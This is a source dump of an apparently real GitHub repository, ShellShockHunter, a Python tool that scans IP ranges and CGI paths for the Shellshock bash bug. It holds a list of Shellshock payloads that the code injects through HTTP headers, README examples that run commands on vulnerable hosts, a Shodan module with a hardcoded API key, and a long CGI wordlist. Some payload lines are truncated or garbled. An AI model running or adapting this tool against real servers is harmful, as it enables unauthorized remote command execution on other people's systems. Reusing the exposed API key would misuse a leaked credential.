656 | This program comes with ABSOLUTELY NO WARRANTY; for details type `show w'.
657 | This is free software, and you are welcome to redistribute it
658 | under certain conditions; type `show c' for details.
659 |
660 | The hypothetical commands `show w' and `show c' should show the appropriate
661 | parts of the General Public License. Of course, your program's commands
662 | might be different; for a GUI interface, you would use an "about box".
663 |
664 | You should also get your employer (if you work as a programmer) or school,
665 | if any, to sign a "copyright disclaimer" for the program, if necessary.
666 | For more information on this, and how to apply and follow the GNU GPL, see
667 | .
668 |
669 | The GNU General Public License does not permit incorporating your program
670 | into proprietary programs. If your program is a subroutine library, you
671 | may consider it more useful to permit linking proprietary applications with
672 | the library. If this is what you want to do, use the GNU Lesser General
673 | Public License instead of this License. But first, please read
674 | .
675 |
--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
7 | ShellShockHunter v1.0
8 |
9 |
10 |
11 | It's a simple tool for test vulnerability shellshock
12 |
13 |
14 |
15 |
16 |
17 |
18 |
19 |
20 |
21 |
22 |
23 | ```
24 | Autor: MrCl0wn
25 | Blog: http://blog.mrcl0wn.com
26 | GitHub: https://github.com/MrCl0wnLab
27 | Twitter: https://twitter.com/MrCl0wnLab
28 | Email: mrcl0wnlab\@\gmail.com
29 | ```
30 |
31 | ### Shellshock (software bug)
32 | Shellshock, also known as Bashdoor, is a family of security bugs in the Unix
33 | Bash shell, the first of which was disclosed on 24 September 2014. Shellshock
34 | could enable an attacker to cause Bash to execute arbitrary commands and
35 | gain unauthorized access to many Internet-facing services, such as web servers,
36 | that use Bash to process requests.
37 |
38 |
39 | ### Disclaimer
40 | This or previous program is for Educational purpose ONLY. Do not use it without permission. The usual disclaimer applies, especially the fact that me (***MrCl0wnLab***) is not liable for any damages caused by direct or indirect use of the information or functionality provided by these programs. The author or any Internet provider bears NO responsibility for content or misuse of these programs or any derivatives thereof. By using these programs you accept the fact that any damage (dataloss, system crash, system compromise, etc.) caused by the use of these programs is not ***MrCl0wnLab's*** responsibility.
41 |
42 |
43 | ### Installation
44 | > Use the package manager [pip](https://pip.pypa.io/en/stable/)
45 |
46 | ### Pip
47 |
48 | ```
49 | pip install shodan
50 | pip install ipinfo
51 | ```
52 | ### Help
53 |
54 | ```
55 | python main.py --help
56 |
57 |
58 | ,/
59 | ,'/
60 | ,' /
61 | ,' /_____,
62 | .'____ ,'
63 | / ,'
64 | / ,'
65 | /,'
66 | /'
67 | ____ _ _____ _ _ ____ _ ___ _
68 | / ___|| |__ |___ /| | | | / ___|| |__ / _ \ ___| | __
69 | \___ \| '_ \ |_ \| | | | \___ \| '_ \| | | |/ __| |/ /
70 | ___) | | | |___) | |___| |___ ___) | | | | |_| | (__| <
71 | |____/|_| |_|____/|_____|_____|____/|_| |_|\___/ \___|_|\_\
72 | __ _ _ _ __
73 | | _| | | | |_ _ _ __ | |_ ___ _ __ |_ |
74 | | | | |_| | | | | '_ \| __/ _ \ '__| | |
75 | | | | _ | |_| | | | | || __/ | | |
76 | | | |_| |_|\__,_|_| |_|\__\___|_| | |
77 | |__| |__| v1.0
78 | By: MrCl0wn / https://blog.mrcl0wn.com
79 |
80 | usage: tool [-h] [--file ] [--range ,]
81 | [--cmd-cgi ] [--exec-vuln ] [--thread <20>]
82 | [--check] [--ssl] [--cgi-file ] [--timeout <5>] [--all] [--debug]
83 |
84 | optional arguments:
85 | -h, --help show this help message and exit
86 | --file Input your target host lists
87 | --range , Set range IP Eg.: 192.168.15.1,192.168.15.100
88 | --cmd-cgi Define shell command that will be executed in the payload
89 | --exec-vuln Executing commands on vulnerable targets
90 | --thread <20>, -t <20> Eg. 20
91 | --check Check for shellshock vulnerability
92 | --ssl Enable request with SSL
93 | --cgi-file Defines a CGI file to be used
94 | --timeout <5> Set connection timeout
95 | --all Teste all payloads
96 | --debug, -d Enable debug mode
97 |
98 | ```
99 |
100 | ### Command e.g:
101 | ```
102 | python main.py --range '194.206.187.X,194.206.187.XXX' --check --thread 40 --ssl
103 |
104 | python main.py --range '194.206.187.X,194.206.187.XXX' --check --thread 10 --ssl --cgi-file 'wordlist/cgi.txt'
105 |
106 | python main.py --range '194.206.187.X,194.206.187.XXX' --cmd 'id;uname -a' --thread 10 --ssl --cgi-file 'wordlist/cgi.txt'
107 |
108 | python main.py --file targets.txt --cmd 'id;uname -a' --thread 10 --ssl --cgi-file 'wordlist/cgi.txt'
109 |
110 | python main.py --file targets.txt --cmd 'id;uname -a' --thread 10 --ssl --cgi-file 'wordlist/cgi.txt' --all
111 |
112 | python main.py --range '194.206.187.X,194.206.187.XXX' --check --thread 40 --ssl --cgi-file 'wordlist/cgi2.txt' --exec-vuln 'curl -v -k -i "_TARGET_"'
113 |
114 | python main.py --range '194.206.187.X,194.206.187.XXX' --check --thread 40 --ssl --cgi-file 'wordlist/cgi2.txt' --exec-vuln './exploit -t "_TARGET_"'
115 |
116 | python main.py --range '194.206.187.X,194.206.187.XXX' --check --thread 40 --ssl --cgi-file 'wordlist/cgi2.txt' --exec-vuln './exploit -t "_TARGET_"' --debug
117 | ```
118 | ### Prints:
119 | #### START
120 | 
121 | #### PROCESS
122 | 
123 | #### SPECIAL COMMAND ( --exec-vuln 'echo ```"_TARGET_"```' )
124 | 
125 | #### COMMAND ( --debug )
126 | 
127 | --debug
128 | ### Source file ( Exploits )
129 | >pwd: assets/exploits.json
130 | ```json
131 | {
132 | "DEFAULT":
133 | "() { :; }; echo ; /bin/bash -c '_COMMAND_'",
134 | "CVE-2014-6271":
135 | "() { :; }; echo _CHECKER_; /bin/bash -c '_COMMAND_'",
136 | "CVE-2014-6271-2":
137 | "() { :;}; echo '_CHECKER_' 'BASH_FUNC_x()=() { :;}; echo _CHECKER_' bash -c 'echo _COMMAND_'",
138 | "CVE-2014-6271-3":
139 | "() { :; }; echo ; /bin/bash -c '_COMMAND_';echo _CHECKER_;",
140 | "CVE-2014-7169":
141 | "() { (a)=>\\' /bin/bash -c 'echo _CHECKER_'; cat echo",
142 | "CVE-2014-7186":
143 | "/bin/bash -c 'true <_[$($())] { echo _CHECKER_; id; } /bin/bash -c '_COMMAND_'",
148 | "CVE-2014-6278-2":
149 | "shellshocker='() { echo _CHECKER_; }' bash -c shellshocker",
150 | "CVE-2014-6277":
151 | "() { x() { _; }; x() { _; } <pwd: assets/config.json
158 | ```json
159 | {
160 | "config": {
161 | "threads": 20,
162 | "path": {
163 | "path_output": "output/",
164 | "path_wordlist": "wordlist/",
165 | "path_modules": "modules/",
166 | "path_assets": "assets/"
167 | },
168 | "files_assets":{
169 | "config": "assets/config.json",
170 | "autor": "assets/autor.json",
171 | "exploits": "assets/exploits.json"
172 | },
173 | "api":{
174 | "shodan":"",
175 | "ipinfo":""
176 | }
177 | }
178 | }
179 | ```
180 | ### Tree
181 |
182 | ```bash
183 | ├── assets
184 | │ ├── autor.json
185 | │ ├── config.json
186 | │ ├── exploits.json
187 | │ └── prints
188 | │ ├── banner.png
189 | │ ├── print00.png
190 | │ ├── print01.png
191 | │ ├── print02.png
192 | │ └── print03.png
193 | ├── LICENSE
194 | ├── main.py
195 | ├── modules
196 | │ ├── banner_shock.py
197 | │ ├── color_shock.py
198 | │ ├── debug_shock.py
199 | │ ├── file_shock.py
200 | │ ├── __init__.py
201 | │ ├── request_shock.py
202 | │ ├── shodan_shock.py
203 | │ └── thread_shock.py
204 | ├── output
205 | │ └── vuln.txt
206 | ├── README.md
207 | └── wordlist
208 | └── cgi.txt
209 | ```
210 |
211 | ### Ref
212 | - https://owasp.org/www-pdf-archive/Shellshock_-_Tudor_Enache.pdf
213 | - https://en.wikipedia.org/wiki/Shellshock_%28software_bug%29#CVE-2014-7186_and_CVE-2014-7187_Details
214 | - https://blog.inurl.com.br/search?q=shellshock
215 | - https://github.com/googleinurl/Xpl-SHELLSHOCK-Ch3ck/blob/master/xplSHELLSHOCK.php
216 | - https://github.com/chelseakomlo/shellshock_demo
217 | - https://github.com/xdistro/ShellShock/blob/master/shellshock_test.sh
218 | - https://github.com/capture0x/XSHOCK/blob/master/main.py
219 | - https://lcamtuf.blogspot.com/2014/10/bash-bug-how-we-finally-cracked.html
220 | - https://blog.sucuri.net/2014/09/bash-vulnerability-shell-shock-thousands-of-cpanel-sites-are-high-risk.html
221 | - https://github.com/BuddhaLabs/PacketStorm-Exploits/blob/master/1410-exploits/apachemodcgi-shellshock.txt
222 | - https://github.com/gajos112/OSCP/blob/master/Shellshock.txt
223 | - https://dl.packetstormsecurity.net/1606-exploits/sunsecuregdog-shellshock.txt
224 | - http://stuff.ipsecs.com/files/ucs-shellshock_pl.txt
225 | - https://github.com/opsxcq/exploit-CVE-2014-6271
226 | - https://en.wikipedia.org/wiki/Shellshock_%28software_bug%29#CVE-2014-7186_and_CVE-2014-7187_Details
227 | - https://manualdousuario.net/shellshock-bash-falha/
228 | - https://darrenmartyn.ie/2021/01/24/visualdoor-sonicwall-ssl-vpn-exploit
229 |
230 |
231 | ### Roadmap
232 | I started this project to study a little more python and interact more with APIS like shodan and ipinfo.
233 | * [x] Command line structure
234 | * [x] Banner
235 | * [x] File management class
236 | * [x] HttpRequests management class
237 | * [x] Thread management class
238 | * [x] Source file for exploits
239 | * [x] Color in process
240 | * [x] Shell Exec on vulnerable targets
241 | * [x] Process debug
242 |
--------------------------------------------------------------------------------
/assets/autor.json:
--------------------------------------------------------------------------------
1 | {
2 | "name": "Cleiton Pinheiro aka Mr. Cl0wn",
3 | "credits": [
4 | "Cleiton Pinheiro"
5 | ],
6 | "license": "GPL",
7 | "version": "0.1",
8 | "maintainer": "Cleiton Pinheiro aka Mr. Cl0wn",
9 | "email": "mrcl0wnlab@gmail.com",
10 | "blog": "https://blog.mrcl0wn.com"
11 | }
--------------------------------------------------------------------------------
/assets/config.json:
--------------------------------------------------------------------------------
1 | {
2 | "config": {
3 | "threads": 20,
4 | "path": {
5 | "path_output": "output/",
6 | "path_wordlist": "wordlist/",
7 | "path_modules": "modules/",
8 | "path_assets": "assets/"
9 | },
10 | "files_assets":{
11 | "config": "assets/config.json",
12 | "autor": "assets/autor.json",
13 | "exploits": "assets/exploits.json"
14 | },
15 | "api":{
16 | "shodan":"",
17 | "ipinfo":""
18 | }
19 |
20 | }
21 | }
--------------------------------------------------------------------------------
/assets/exploits.json:
--------------------------------------------------------------------------------
1 | {
2 | "DEFAULT":
3 | "() { :; }; echo ; /bin/bash -c '_COMMAND_'",
4 | "CVE-2014-6271":
5 | "() { :; }; echo _CHECKER_; /bin/bash -c '_COMMAND_'",
6 | "CVE-2014-6271-2":
7 | "() { :;}; echo '_CHECKER_' 'BASH_FUNC_x()=() { :;}; echo _CHECKER_' bash -c 'echo _COMMAND_'",
8 | "CVE-2014-6271-3":
9 | "() { :; }; echo ; /bin/bash -c '_COMMAND_';echo _CHECKER_;",
10 | "CVE-2014-7169":
11 | "() { (a)=>\\' /bin/bash -c 'echo _CHECKER_'; cat echo",
12 | "CVE-2014-7186":
13 | "/bin/bash -c 'true <_[$($())] { echo _CHECKER_; id; } /bin/bash -c '_COMMAND_'",
18 | "CVE-2014-6278-2":
19 | "shellshocker='() { echo _CHECKER_; }' bash -c shellshocker",
20 | "CVE-2014-6277":
21 | "() { x() { _; }; x() { _; } <', required=False)
240 | parser.add_argument('--range', help='Set range IP Eg.: 192.168.15.1,192.168.15.100', metavar=',', required=False)
241 | parser.add_argument('--cmd-cgi', help='Define shell command that will be executed in the payload ',default=None, metavar='', required=False)
242 | parser.add_argument('--exec-vuln', help='Executing commands on vulnerable targets',default=None, metavar='', required=False)
243 | parser.add_argument('--thread','-t', help='Eg. 20',metavar='<20>', default=CONFIG_THREAD, required=False)
244 | parser.add_argument('--check', help='Check for shellshock vulnerability',action='store_true', default=False)
245 | parser.add_argument('--ssl', help='Enable request with SSL ',action='store_true', default=False)
246 | parser.add_argument('--cgi-file', help='Defines a CGI file to be used ',default=CONFIG_PATH_WORDLIST+'cgi.txt', metavar='', required=False)
247 | parser.add_argument('--timeout', help='Set connection timeout',default=5, metavar='<5>', required=False)
248 | parser.add_argument('--all', help='Teste all payloads',action='store_true', default=False)
249 | parser.add_argument('--debug','-d', help='Enable debug mode ',action='store_true', default=False)
250 |
251 | arg_menu = parser.parse_args()
252 |
253 | if not (arg_menu.file or arg_menu.range):
254 | exit(parser.print_help())
255 |
256 | if arg_menu.debug:
257 | OBJ_Debug.debug()
258 |
259 | FILE_TARGET_STR = arg_menu.file
260 | FILE_NAME_CGI = arg_menu.cgi_file
261 | TARGET_RANGE_STR = arg_menu.range
262 | COMMAND_SHELL_STR = arg_menu.cmd_cgi
263 | COMMAND_EXEC_SHELL_STR = arg_menu.exec_vuln
264 |
265 | CHECKER = arg_menu.check
266 | FORCE_HTTPS = arg_menu.ssl
267 | TEST_ALL_PAYLOADS = arg_menu.all
268 | MAX_CONECTION_THREAD = int(arg_menu.thread)
269 | TIMEOUT_REQUEST = int(arg_menu.timeout)
270 |
271 | FILE_CGI_LIST = OBJ_FileLocal.open_get_lines(FILE_NAME_CGI)
272 | OBJ_RequestShock.protocol = 'https' if FORCE_HTTPS else 'https'
273 |
274 |
275 | process()
276 |
277 |
278 |
279 |
280 |
--------------------------------------------------------------------------------
/modules/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/MrCl0wnLab/ShellShockHunter/bb37330293d2a99e8193d3cfc881dab90c411c86/modules/__init__.py
--------------------------------------------------------------------------------
/modules/banner_shock.py:
--------------------------------------------------------------------------------
1 |
2 | class BannerShock:
3 | def __new__(cls):
4 | return (f"""
5 | ,/
6 | ,'/
7 | ,' /
8 | ,' /_____,
9 | .'____ ,'
10 | / ,'
11 | / ,'
12 | /,'
13 | /'
14 | ____ _ _____ _ _ ____ _ ___ _
15 | / ___|| |__ |___ /| | | | / ___|| |__ / _ \ ___| | __
16 | \___ \| '_ \ |_ \| | | | \___ \| '_ \| | | |/ __| |/ /
17 | ___) | | | |___) | |___| |___ ___) | | | | |_| | (__| <
18 | |____/|_| |_|____/|_____|_____|____/|_| |_|\___/ \___|_|\_\\
19 | __ _ _ _ __
20 | | _| | | | |_ _ _ __ | |_ ___ _ __ |_ |
21 | | | | |_| | | | | '_ \| __/ _ \ '__| | |
22 | | | | _ | |_| | | | | || __/ | | |
23 | | | |_| |_|\__,_|_| |_|\__\___|_| | |
24 | |__| |__| v1.0
25 | By: MrCl0wn / https://blog.mrcl0wn.com
26 | """)
27 |
--------------------------------------------------------------------------------
/modules/color_shock.py:
--------------------------------------------------------------------------------
1 |
2 | class ColorShock:
3 | def __new__(cls):
4 | return {
5 | 'end': '\033[0m',
6 | 'white': '\33[37m',
7 | 'white2': '\33[97m',
8 | 'black': '\033[30m',
9 | 'red': '\033[31m',
10 | 'green': '\033[32m',
11 | 'orange': '\033[33m',
12 | 'blue': '\033[34m',
13 | 'purple': '\033[35m',
14 | 'cyan': '\033[36m',
15 | 'pink': '\033[95m',
16 | 'yellow': '\033[93m',
17 | 'light_grey': '\033[37m',
18 | 'dark_grey': '\033[90m',
19 | 'light_red': '\033[91m',
20 | 'light_green': '\033[92m',
21 | 'light_blue': '\033[94m',
22 | 'light_cyan': '\033[96m',
23 | }
24 |
--------------------------------------------------------------------------------
/modules/debug_shock.py:
--------------------------------------------------------------------------------
1 | import logging
2 |
3 | class DebugShock:
4 |
5 | def debug(self):
6 | return logging.basicConfig(level=logging.DEBUG)
7 |
--------------------------------------------------------------------------------
/modules/file_shock.py:
--------------------------------------------------------------------------------
1 | import csv
2 | import os
3 | import json
4 |
5 | class FileLocal:
6 |
7 | def check_file_exist(self, filename: str):
8 | try:
9 | if filename:
10 | return os.path.isfile(filename)
11 | else:
12 | return None
13 | except Exception as err:
14 | print('Error: {}'.format(err))
15 |
16 | def open_file(self, filename: str, mode: str):
17 | try:
18 | if filename:
19 | return open(filename, mode, encoding="utf8")
20 | else:
21 | return None
22 | except Exception as err:
23 | print('Error: {}'.format(err))
24 |
25 | def open_get_lines(self, filename: str):
26 | try:
27 | data = self.open_file(filename, 'r')
28 | if data:
29 | return data.readlines()
30 | else:
31 | return None
32 | except IOError as err:
33 | print('Error: {}'.format(err))
34 |
35 | def save_result(self, str_value: str, filename: str):
36 | try:
37 | data_return = self.open_file(filename, 'a+')
38 | data_return.writelines(str_value)
39 | data_return.close()
40 | except IOError as err:
41 | print('Error: {}'.format(err))
42 |
43 | def open_file_csv(self, filename: str, mode: str):
44 | try:
45 | data_file = self.open_file(filename, mode)
46 | if data_file:
47 | data_return = csv.DictReader(data_file)
48 | return data_file, data_return
49 | else:
50 | return None
51 | except IOError as err:
52 | print('Error: {}'.format(err))
53 |
54 | def open_file_json(self, filename:str):
55 | try:
56 | myFile = self.open_file(filename, 'r')
57 | myFile = json.load(myFile)
58 | return myFile
59 | except IOError as err:
60 | print('Error: {}'.format(err))
61 |
--------------------------------------------------------------------------------
/modules/request_shock.py:
--------------------------------------------------------------------------------
1 |
2 | import time
3 | import requests
4 | from urllib.parse import urlparse
5 | from requests.exceptions import ConnectionError
6 |
7 | class RequestShock:
8 | def __init__(self):
9 | self.protocol = 'https'
10 | self.timeout = 4
11 | self.header = {}
12 |
13 | def send_request(self, _target: str, _value_header: str):
14 | try:
15 | if _target:
16 |
17 | target_url = self.protocol + '://'+_target
18 | url_parser = urlparse(target_url)
19 |
20 | header = {
21 | "Content-type": "application/x-www-form-urlencoded",
22 | "Referer": _value_header,
23 | "Cookie": _value_header,
24 | "User-Agent": _value_header,
25 | "host": url_parser.netloc
26 | }
27 | start = time.time()
28 | result = requests.get(
29 | url=target_url, headers=header, verify=False, timeout=self.timeout
30 | )
31 | time_final = (f'in {time.time() - start:.2f}s')
32 | result.raise_for_status()
33 |
34 | if result:
35 | return target_url, result.text.replace("\n", ""), result.status_code, time_final
36 | return target_url, 'ERROR!', result.status_code, time_final
37 | except:
38 | return target_url, str(), str(), str()
39 |
--------------------------------------------------------------------------------
/modules/shodan_shock.py:
--------------------------------------------------------------------------------
1 | import shodan
2 |
3 | SHODAN_API_KEY = "wOz4TpERqzEbYvj7JjWxskh3F5DBUnIf"
4 |
5 |
6 | class ShodanShock:
7 | def __init__(self, shoddan_api_key_str: str):
8 | self._api = shodan.Shodan(shoddan_api_key_str)
9 |
10 | def search_str(self, word: str):
11 | try:
12 | # Search Shodan
13 | results = self._api.search(word)
14 | if results:
15 | return results
16 | return None
17 | except shodan.APIError as err:
18 | print('Error: {}'.format(err))
19 |
20 | def search_ip_str(self, word: str) -> list:
21 | try:
22 | if word:
23 | ip_list = []
24 | results = self.search_str(word)
25 | if results:
26 | for result in results['matches']:
27 | ip_list.append(format(result['ip_str']))
28 | return ip_list
29 | return None
30 | return None
31 | except shodan.APIError as err:
32 | print('Error: {}'.format(err))
33 |
--------------------------------------------------------------------------------
/modules/thread_shock.py:
--------------------------------------------------------------------------------
1 | import time
2 | import threading
3 | from concurrent.futures import ThreadPoolExecutor
4 |
5 |
6 | class ThreadShock:
7 | def __init__(self):
8 | self.max_conection = 20
9 | self.__time_sleep = 1
10 |
11 | def exec_thread(self, _function_name, _command_str, _target_list, _mix):
12 | if _function_name and _command_str and _target_list:
13 | try:
14 | list_threads = []
15 | for tgt_str in _target_list:
16 | if tgt_str:
17 | while threading.active_count() > self.max_conection:
18 | time.sleep(self.__time_sleep)
19 | thread = threading.Thread(
20 | target=_function_name, args=(
21 | tgt_str, _command_str, _mix,)
22 | )
23 | list_threads.append(thread)
24 | thread.start()
25 | for thread in list_threads:
26 | thread.join()
27 | except:
28 | pass
29 |
30 |
31 | def main_pool_thread(self, _function_name, _target, _command, _exploit: list):
32 | return self.setting_main_pool_thread(_function_name, [_target], [_command], [_exploit])
33 |
34 |
35 | def setting_main_pool_thread(self, _function_name, _target, _command, _exploit: list):
36 | try:
37 | executor = ThreadPoolExecutor(max_workers=self.max_conection)
38 | executor.map(_function_name, _target, _command, _exploit)
39 | executor.shutdown(wait=True)
40 | executor.shutdown()
41 | except Exception as err:
42 | print(err)
43 | pass
44 |
--------------------------------------------------------------------------------
/output/vuln.txt:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/MrCl0wnLab/ShellShockHunter/bb37330293d2a99e8193d3cfc881dab90c411c86/output/vuln.txt
--------------------------------------------------------------------------------
/wordlist/cgi.txt:
--------------------------------------------------------------------------------
1 | /_mt/mt.cgi
2 | /admin.cgi
3 | /administrator.cgi
4 | /agora.cgi
5 | /aktivate/cgi-bin/catgy.cgi
6 | /analyse.cgi
7 | /apps/web/vs_diag.cgi
8 | /axis-cgi/buffer/command.cgi
9 | /b2-include/b2edit.showposts.php
10 | /bandwidth/index.cgi
11 | /bigconf.cgi
12 | /cart.cgi
13 | /cartcart.cgi
14 | /ccbill/whereami.cgi
15 | /cgi_wrapper
16 | /cgi-bin-sdb/printenv
17 | /cgi-bin/
18 | /cgi-bin/.cgi
19 | /cgi-bin/.cobalt/alert/service.cgi
20 | /cgi-bin/.cobalt/message/message.cgi
21 | /cgi-bin/.cobalt/siteUserMod/siteUserMod.cgi
22 | /cgi-bin/.namazu.cgi
23 | /cgi-bin/%2f/admin.html
24 | /cgi-bin/14all-1.1.cgi
25 | /cgi-bin/14all.cgi
26 | /cgi-bin/a1disp3.cgi
27 | /cgi-bin/a1stats/a1disp3.cgi
28 | /cgi-bin/a1stats/a1disp4.cgi
29 | /cgi-bin/add_ftp.cgi
30 | /cgi-bin/addbanner.cgi
31 | /cgi-bin/adduser.cgi
32 | /cgi-bin/admin.cgi
33 | /cgi-bin/admin.html
34 | /cgi-bin/admin.pl
35 | /cgi-bin/admin/admin.cgi
36 | /cgi-bin/admin/getparam.cgi
37 | /cgi-bin/admin/setup.cgi
38 | /cgi-bin/adminhot.cgi
39 | /cgi-bin/adminwww.cgi
40 | /cgi-bin/af.cgi
41 | /cgi-bin/aglimpse.cgi
42 | /cgi-bin/alienform.cgi
43 | /cgi-bin/AnyBoard.cgi
44 | /cgi-bin/architext_query.cgi
45 | /cgi-bin/astrocam.cgi
46 | /cgi-bin/AT-admin.cgi
47 | /cgi-bin/AT-generate.cgi
48 | /cgi-bin/auction/auction.cgi
49 | /cgi-bin/auktion.cgi
50 | /cgi-bin/authLogin.cgi
51 | /cgi-bin/ax-admin.cgi
52 | /cgi-bin/ax.cgi
53 | /cgi-bin/axs.cgi
54 | /cgi-bin/badmin.cgi
55 | /cgi-bin/banner.cgi
56 | /cgi-bin/bannereditor.cgi
57 | /cgi-bin/bash
58 | /cgi-bin/bb-ack.sh
59 | /cgi-bin/bb-hist.sh
60 | /cgi-bin/bb-histlog.sh
61 | /cgi-bin/bb-hostsvc.sh
62 | /cgi-bin/bb-rep.sh
63 | /cgi-bin/bb-replog.sh
64 | /cgi-bin/bbs_forum.cgi
65 | /cgi-bin/bigconf.cgi
66 | /cgi-bin/bizdb1-search.cgi
67 | /cgi-bin/blog/mt-check.cgi
68 | /cgi-bin/blog/mt-load.cgi
69 | /cgi-bin/bnbform.cgi
70 | /cgi-bin/book.cgi
71 | /cgi-bin/boozt/admin/index.cgi
72 | /cgi-bin/bsguest.cgi
73 | /cgi-bin/bslist.cgi
74 | /cgi-bin/build.cgi
75 | /cgi-bin/bulk/bulk.cgi
76 | /cgi-bin/c_download.cgi
77 | /cgi-bin/cached_feed.cgi
78 | /cgi-bin/cachemgr.cgi
79 | /cgi-bin/calendar/index.cgi
80 | /cgi-bin/cartmanager.cgi
81 | /cgi-bin/cbmc/forums.cgi
82 | /cgi-bin/ccvsblame.cgi
83 | /cgi-bin/cgforum.cgi
84 | /cgi-bin/cgi_process
85 | /cgi-bin/cgiinfo.cgi
86 | /cgi-bin/cgitest.py
87 | /cgi-bin/classified.cgi
88 | /cgi-bin/classifieds.cgi
89 | /cgi-bin/classifieds/classifieds.cgi
90 | /cgi-bin/classifieds/index.cgi
91 | /cgi-bin/commandit.cgi
92 | /cgi-bin/commerce.cgi
93 | /cgi-bin/common/listrec.pl
94 | /cgi-bin/compatible.cgi
95 | /cgi-bin/contact.cgi
96 | /cgi-bin/Count.cgi
97 | /cgi-bin/csChatRBox.cgi
98 | /cgi-bin/csGuestBook.cgi
99 | /cgi-bin/csLiveSupport.cgi
100 | /cgi-bin/CSMailto.cgi
101 | /cgi-bin/CSMailto/CSMailto.cgi
102 | /cgi-bin/csNews.cgi
103 | /cgi-bin/csNewsPro.cgi
104 | /cgi-bin/csPassword.cgi
105 | /cgi-bin/csPassword/csPassword.cgi
106 | /cgi-bin/csSearch.cgi
107 | /cgi-bin/csv_db.cgi
108 | /cgi-bin/cvsblame.cgi
109 | /cgi-bin/cvslog.cgi
110 | /cgi-bin/cvsquery.cgi
111 | /cgi-bin/cvsqueryform.cgi
112 | /cgi-bin/day5datacopier.cgi
113 | /cgi-bin/day5datanotifier.cgi
114 | /cgi-bin/db_manager.cgi
115 | /cgi-bin/dbman/db.cgi
116 | /cgi-bin/dcforum.cgi
117 | /cgi-bin/dcshop.cgi
118 | /cgi-bin/defaultwebpage.cgi
119 | /cgi-bin/dfire.cgi
120 | /cgi-bin/diagnose.cgi
121 | /cgi-bin/dig.cgi
122 | /cgi-bin/directorypro.cgi
123 | /cgi-bin/download.cgi
124 | /cgi-bin/e87_Ba79yo87.cgi
125 | /cgi-bin/emu/html/emumail.cgi
126 | /cgi-bin/emumail.cgi
127 | /cgi-bin/emumail/emumail.cgi
128 | /cgi-bin/enter.cgi
129 | /cgi-bin/env.cgi
130 | /cgi-bin/environ.cgi
131 | /cgi-bin/environment.cgi
132 | /cgi-bin/ezadmin.cgi
133 | /cgi-bin/ezboard.cgi
134 | /cgi-bin/ezman.cgi
135 | /cgi-bin/ezmlm-browse
136 | /cgi-bin/ezshopper/loadpage.cgi
137 | /cgi-bin/ezshopper/search.cgi
138 | /cgi-bin/ezshopper2/loadpage.cgi
139 | /cgi-bin/ezshopper3/loadpage.cgi
140 | /cgi-bin/faqmanager.cgi
141 | /cgi-bin/FileSeek.cgi
142 | /cgi-bin/FileSeek2.cgi
143 | /cgi-bin/finger.cgi
144 | /cgi-bin/fire.cgi
145 | /cgi-bin/firmwarecfg
146 | /cgi-bin/flexform.cgi
147 | /cgi-bin/fom.cgi
148 | /cgi-bin/fom/fom.cgi
149 | /cgi-bin/FormHandler.cgi
150 | /cgi-bin/FormMail.cgi
151 | /cgi-bin/forum.cgi
152 | /cgi-bin/gbadmin.cgi
153 | /cgi-bin/gbook/gbook.cgi
154 | /cgi-bin/generate.cgi
155 | /cgi-bin/getdoc.cgi
156 | /cgi-bin/gH.cgi
157 | /cgi-bin/gm-authors.cgi
158 | /cgi-bin/gm-cplog.cgi
159 | /cgi-bin/gm.cgi
160 | /cgi-bin/guestbook.cgi
161 | /cgi-bin/handler
162 | /cgi-bin/handler.cgi
163 | /cgi-bin/handler/netsonar
164 | /cgi-bin/hello
165 | /cgi-bin/hello.cgi
166 | /cgi-bin/helpme
167 | /cgi-bin/hi
168 | /cgi-bin/his
169 | /cgi-bin/hitview.cgi
170 | /cgi-bin/hsx.cgi
171 | /cgi-bin/html2chtml.cgi
172 | /cgi-bin/html2wml.cgi
173 | /cgi-bin/htsearch.cgi
174 | /cgi-bin/icat
175 | /cgi-bin/ICuGI/EST/blast_detail.cgi
176 | /cgi-bin/if/admin/nph-build.cgi
177 | /cgi-bin/ikonboard/help.cgi
178 | /cgi-bin/imageFolio.cgi
179 | /cgi-bin/ImageFolio/admin/admin.cgi
180 | /cgi-bin/index.cgi
181 | /cgi-bin/info.cgi
182 | /cgi-bin/info.sh
183 | /cgi-bin/infosrch.cgi
184 | /cgi-bin/jammail.pl
185 | /cgi-bin/jarrewrite.sh
186 | /cgi-bin/journal.cgi
187 | /cgi-bin/lastlines.cgi
188 | /cgi-bin/loadpage.cgi
189 | /cgi-bin/log-reader.cgi
190 | /cgi-bin/login.cgi
191 | /cgi-bin/logit.cgi
192 | /cgi-bin/lookwho.cgi
193 | /cgi-bin/lwgate.cgi
194 | /cgi-bin/MachineInfo
195 | /cgi-bin/magiccard.cgi
196 | /cgi-bin/mail/emumail.cgi
197 | /cgi-bin/mail/nph-mr.cgi
198 | /cgi-bin/maillist.cgi
199 | /cgi-bin/mailnews.cgi
200 | /cgi-bin/main_menu.pl
201 | /cgi-bin/main.cgi
202 | /cgi-bin/man.sh
203 | /cgi-bin/meme.cgi
204 | /cgi-bin/mini_logger.cgi
205 | /cgi-bin/mmstdod.cgi
206 | /cgi-bin/moin.cgi
207 | /cgi-bin/mojo/mojo.cgi
208 | /cgi-bin/mrtg.cgi
209 | /cgi-bin/mt-static/mt-check.cgi
210 | /cgi-bin/mt-static/mt-load.cgi
211 | /cgi-bin/mt.cgi
212 | /cgi-bin/mt/mt-check.cgi
213 | /cgi-bin/mt/mt-load.cgi
214 | /cgi-bin/mt/mt.cgi
215 | /cgi-bin/musicqueue.cgi
216 | /cgi-bin/myguestbook.cgi
217 | /cgi-bin/myprog2.cgi
218 | /cgi-bin/nbmember.cgi
219 | /cgi-bin/netauth.cgi
220 | /cgi-bin/netpad.cgi
221 | /cgi-bin/newsdesk.cgi
222 | /cgi-bin/nlog-smb.cgi
223 | /cgi-bin/nph-emumail.cgi
224 | /cgi-bin/nph-exploitscanget.cgi
225 | /cgi-bin/nph-publish.cgi
226 | /cgi-bin/nph-test.cgi
227 | /cgi-bin/pagelog.cgi
228 | /cgi-bin/pathtest.pl
229 | /cgi-bin/pbcgi.cgi
230 | /cgi-bin/perlshop.cgi
231 | /cgi-bin/pfdispaly.cgi
232 | /cgi-bin/pfdisplay.cgi
233 | /cgi-bin/phf.cgi
234 | /cgi-bin/photo/manage.cgi
235 | /cgi-bin/photo/protected/manage.cgi
236 | /cgi-bin/php
237 | /cgi-bin/php-cgi
238 | /cgi-bin/php.cgi
239 | /cgi-bin/php.fcgi
